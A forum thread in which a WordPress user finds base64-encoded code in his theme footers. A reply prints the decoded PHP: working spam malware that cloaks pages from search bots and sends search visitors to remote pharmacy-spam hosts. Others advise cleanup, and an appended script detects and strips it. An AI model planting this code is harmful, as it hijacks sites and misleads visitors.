
Base64 decoded

Discussion in 'PHP & Perl' started by Darksider, Mar 4, 2014.

  1. Darksider

    Hello, I found some junk base64 code in the footer of all my WordPress themes. Can somebody check this code and tell me what this code does on my site? Thanks. The code is on Pastebin.
    Code:
    http://pastebin.com/4mc5xWZX
     
  2. SEOGrenoble

    Just replace "eval" with "print" and you will get the PHP code executed by the hacker.
     
  3. thebigweb

    It looks dodgy so I would remove it. Here is the actual code decoded: -

    Code:
    if (!defined('frmDs')){
    	define('frmDs' ,1);
    	error_reporting(0);
    	
    	function frm_dl ($url) {
    		if (function_exists('curl_init')) {
    			$ch = curl_init($url);
    			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    			$out = curl_exec ($ch);
    			if (curl_errno($ch) !== 0) $out = false;
    			curl_close ($ch);
    		} else {$out = @file_get_contents($url);}
    		return trim($out);
    	}
    	
    	function frm_crpt($in){
    		$il=strlen($in);$o='';
    		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
    		return $o;
    	}
    	
    	function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
    		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
    		$fe = file_exists($f);
    		if(!$fe || time() - filemtime($f) > 60 * $cmtime)
    		{
    			$dlc=frm_dl($link);
    			if($fe && $dlc===false) 
    				@touch($f);
    			else
    			{
    				if($fe && empty($dlc) && $toe) 
    				{
    					@touch($f);
    				}
    				else
    				{
    					if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
    					else{return $dlc;}
    				}
    			}
    		}
    		$fc = @file_get_contents($f);
    		return ($fc)?frm_crpt($fc):'';
    	}
    	
    	function frm_isbot(){
    		$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
    		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
    		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
    					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
    					array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
    		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
    		if(!$ua)return true;
    		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
    		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
    		$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
    		$hba=array('google','msn','yahoo');
    		if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
    		return false;
    	}
    	
    	function frm_tmpdir(){
    		$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
            foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
                if ($t = getenv($v)) {$fs[]=$t;}
            }
            if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
            $fs[]='.';
            
            foreach ($fs as $f){
            	$tf = $f.'/'.md5(rand());
            	if($fp = @fopen($tf, 'w')){
            		fclose($fp);
            		unlink($tf);
            		return $f;
            	}
            }
    		return false;
    	}
    
    	function frm_seref(){
    		$r = @strtolower($_SERVER["HTTP_REFERER"]);
    		$ses = array('google','bing','yahoo','ask','aol');
    		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
    		return false;
    	}
    	
    	function frm_havekey($s=false){
    		$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
    		$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
    		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
    		foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
    		return '';
    	}
    	
    	function frm_strtonum($Str, $Check, $Magic) {
    		$Int32Unit = 4294967296;
    		$length = strlen($Str);
    		for ($i = 0; $i < $length; $i++) {
    			$Check *= $Magic;
    			if ($Check >= $Int32Unit) {
    				$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
    				$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
    			}
    			$Check += ord($Str{$i});
    		}
    		return $Check;
    	}
    
    	function frm_chhash($String) {
    		$Check1 =frm_strtonum($String, 0x1505, 0x21);
    		$Check2 = frm_strtonum($String, 0, 0x1003F);
    		$Check1 >>= 2;
    		$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
    		$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
    		$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
    		$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
    		$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
    		$Hashnum = ($T1 | $T2);
    		$CheckByte = 0;
    		$Flag = 0;
    		$HashStr = sprintf('%u', $Hashnum) ;
    		$length = strlen($HashStr);
    		for ($i = $length - 1;  $i >= 0;  $i --) {
    			$Re = $HashStr{$i};
    			if (1 === ($Flag % 2)) {
    				$Re += $Re;
    				$Re = (int)($Re / 10) + ($Re % 10);
    			}
    			$CheckByte += $Re;
    			$Flag ++;
    		}
    		$CheckByte %= 10;
    		if (0 !== $CheckByte) {
    			$CheckByte = 10 - $CheckByte;
    			if (1 === ($Flag % 2) ) {
    				if (1 === ($CheckByte % 2)) {
    					$CheckByte += 9;
    				}
    				$CheckByte >>= 1;
    			}
    		}
    		return '7'.$CheckByte.$HashStr;
    	}
    	
    	function frm_chpr($url,$td){
    		$ch=frm_chhash($url);
    		$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
    		if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
    	}
    	
    	function frm_red($k){
    		if(!frm_isbot() && frm_seref()){
    			$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
    			$s=@urlencode($_SERVER['HTTP_REFERER']);
    			die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
    		}
    	}
    	
    	$tdir = frm_tmpdir();
    	$isb=frm_isbot();
    	$k=frm_havekey();
    	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
    	if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
    	if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
    		$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
    		$sp = "http://pkurkamjfosr.byinter.net/stat/feed.php?pa=$parg&h=$host";
    		//
    		$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
    		if($isb && ($ppr = frm_chpr($tp)) > 1){
    			$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
    			if($pc) die($pc);
    		}
    		//
    		$ruri = strtolower($_SERVER['REQUEST_URI']);
    		$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
    		if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
    			frm_red($k);
    			die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
    		}	
    		if (($ruri=='/' || $ruri=='/index.php') && $isb) {
    			$c=frm_getcache($tdir, $sp ,60*24);
    			if($c)die($c);
    		}
    		//
    		if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
    			if(strpos($sdl, '|'.$ruri.'|') !== false){
    				frm_red($k);
    				die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
    			}
    		}
    	}
    	if($k) frm_red($k);
    }
     
  4. Darksider

    Thanks for that. I am not a programmer, so I don't know what this code does on my site in footer.php. I checked all my sites on the server, and all themes have this junk code in footer.php.
    I probably got this code with some nulled template or plugin. How do I find the script which automatically posted this code into my files? I am truly grateful for the help.
     
  5. thebigweb

    It could be that your cPanel or your shared hosting has been hacked. If I were you I would first change all FTP passwords. Then change your cPanel password. Download all the files to your computer and use a find and replace tool to locate the code and replace en masse. Re-upload when you are sure you have removed everything. Also, check if any new files have been uploaded recently, as there may be a backdoor PHP shell script that will allow the hackers back in even if you change the passwords. Chances are though that this is just a hacked theme or plugin, but it's better to be safe than sorry!

    **** Make sure you back up everything before you do this though, just in case anything goes wrong!
     
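A static way to do the locate-and-remove step suggested above, as an added example that is not part of the original thread: it decodes the base64 argument in Python instead of running it through PHP, and removes only blocks whose decoded text contains strings from the payload posted in this thread. The `eval(base64_decode('...'))` wrapper shape, the function names and the sample file are assumptions.

```python
import base64
import re
import shutil
from pathlib import Path

# Assumed wrapper shape: eval(base64_decode('...')); the argument is only decoded, never run.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?")
# Strings that appear in the decoded payload posted in this thread.
INDICATORS = (b"frmDs", b"frm_isbot", b"178.73.212.30", b"pkurkamjfosr.byinter.net")
# Constructed, harmless sample: wraps only the marker define, not the real payload.
SAMPLE = (b"<?php eval(base64_decode('" + base64.b64encode(b"define('frmDs',1);")
          + b"')); ?>\n<footer></footer>\n")

def matched_indicators(b64_text: bytes) -> list[str]:
    """Decode one base64 argument statically and list the thread indicators in it."""
    try:
        payload = base64.b64decode(re.sub(rb"\s+", b"", b64_text), validate=True)
    except ValueError:  # malformed base64: not this injection
        return []
    return [i.decode() for i in INDICATORS if i in payload]

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map each .php file under root (relative path) to the indicators found in it."""
    hits = {}
    for path in sorted(root.rglob("*.php")):
        found = set()
        for m in EVAL_B64.finditer(path.read_bytes()):
            found.update(matched_indicators(m.group(2)))
        if found:
            hits[path.relative_to(root).as_posix()] = sorted(found)
    return hits

def clean_file(root: Path, rel: str, backup_root: Path) -> int:
    """Remove matching injections from root/rel, copying the original to backup_root/rel first."""
    path, removed = root / rel, 0
    data = path.read_bytes()
    def drop_if_known(m: re.Match) -> bytes:
        nonlocal removed
        if matched_indicators(m.group(2)):
            removed += 1
            return b""
        return m.group(0)  # unrelated eval(base64_decode()) is left for manual review
    cleaned = EVAL_B64.sub(drop_if_known, data)
    if removed:
        backup = backup_root / rel
        backup.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(path, backup)  # keep backups outside the web root
        path.write_bytes(cleaned)
    return removed
```

Run `scan_tree` on the downloaded copy first and review the list; a file that still contains an `eval(base64_decode(...))` after `clean_file` did not match the indicators and needs a manual look.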
  6. Darksider

    I changed my cPanel password; FTP I don't use. I found this code in 365 files, deleted all of it, then uploaded the files to the server, and everything is working normally. I hope that I don't get this code again in my files tomorrow :) Thanks again, thebigweb. Is there any WordPress plugin which is good against malware, shells, etc.?